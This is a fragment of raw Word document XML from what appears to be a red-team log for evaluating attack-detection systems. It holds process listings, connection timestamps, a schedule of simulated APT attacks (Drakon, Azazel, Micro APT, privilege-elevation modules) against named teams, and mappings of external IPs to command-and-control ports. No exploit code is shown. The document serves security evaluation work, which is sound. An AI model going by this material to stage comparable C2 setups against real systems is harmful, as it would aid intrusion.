    <w:p w14:paraId="1B2C4863" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  536                                             \Device\HarddiskVolume2\Windows\System32\wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1C646" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  552                                              \Device\HarddiskVolume2\Windows\System32\csrss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8029C5" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  624                                            \Device\HarddiskVolume2\Windows\System32\winlogon.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF4933" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  660                                            \Device\HarddiskVolume2\Windows\System32\services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38132E" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*]  668                                              \Device\HarddiskVolume2\Windows\System32\lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244483AF" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737C9E59" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Watched the first 10 of the total 126 connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3AB01" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:05</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Restart benign activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695403C7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:13</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>W1 and W2 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721CEE5" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:16</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>W3 and W4 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B0CB8" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:18</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>W5 and W6 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3CD68" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:2?</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>W7 and W8 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3D1A4" w14:textId="668F90A6" w:rsidR="00CE2C66" w:rsidRPr="00650FDF" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>16:34</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>W9 and W10 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B677E1E" w14:textId="105F07D7" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00CE2C66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc12600108"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">05/17/2019 – </w:t>
      </w:r>
      <w:r w:rsidR="00E002EA" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">TRACE, CADETS, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ClearScope, </w:t>
      </w:r>
      <w:r w:rsidR="00E002EA" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Five Directions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="541A4AFE" w14:textId="49C0D9C2" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc12600109"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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715"/>
        <w:gridCol w:w="5625"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="33AB4497" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FBBC1ED"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09:05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="310B57CC"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TA1 TRACE 1 and 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B33F784"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Azazel APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="6B810151" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C733331"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10:16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A7FAC93"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TA1 CADETS 1 and 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F0C7213"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Firefox Drakon APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="24194EC4" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4F1C6607"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11:50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F830013"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TA1 ClearScope 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FA6911A"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Firefox Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="25BE7DDC" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79EF7124"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12:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71D47E44"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TA1 FiveDirections 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FFCF135"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Firefox DNS Drakon APT FileFilter-Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="65203477" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17EF214A"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13:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BDCC87B"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TA1 MARPLE 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70040427"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Firefox DNS Drakon APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="0F60828D" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F89B371"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14:27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00B5B359"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TA1 ClearScope 1 and 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55AE00C6"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MyApp APK AppStarter APK Micro APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="72AB89AF" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="047D1944"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15:43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E3F0877"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TA1 ClearScope 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63349100"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Lockwatch APK Java APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="2BDDDD40" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39CDF2DD"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16:11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2CEADE87"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TA1 FiveDirections 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4967BD81"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Firefox Verifier Drakon APT FileFilter-Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="4D3BF5D4" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="797D9C7D"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16:20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62E9691C"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TA1 ClearScope 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F724132" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Tester Micro APT BinFmt-Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1052979E" w14:textId="44B7A046" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_y2x27bgszfks" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="197" w:name="_Toc12600110"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="4B8F3475"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10] 170.32.78.39:80 -&gt; 128.55.12.167:8110</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: bits oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC3ED9"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11] 215.237.119.171:80 -&gt; 128.55.12.167:8111</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: serve (bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63FC93"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12] 68.149.51.179:80 -&gt; 128.55.12.167:8112</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: thttpd (bits micro)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD62E7"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14] 49.8.46.240:80 -&gt; 128.55.12.167:8114</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28070B"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15] 42.183.7.162:80 -&gt; 128.55.12.167:8115</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A303A5"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16] 133.39.25.45:80 -&gt; 128.55.12.167:8116</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF91D4"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17] 98.23.182.25:80 -&gt; 128.55.12.167:8117</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: sc serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091A5766"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18] 4.21.51.250:80 -&gt; 128.55.12.167:8118</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52978E63"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21] 108.192.100.31:80 -&gt; 128.55.12.167:8121</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E5DDC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1122] 95.47.65.6:80 -&gt; 128.55.12.167:8122</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
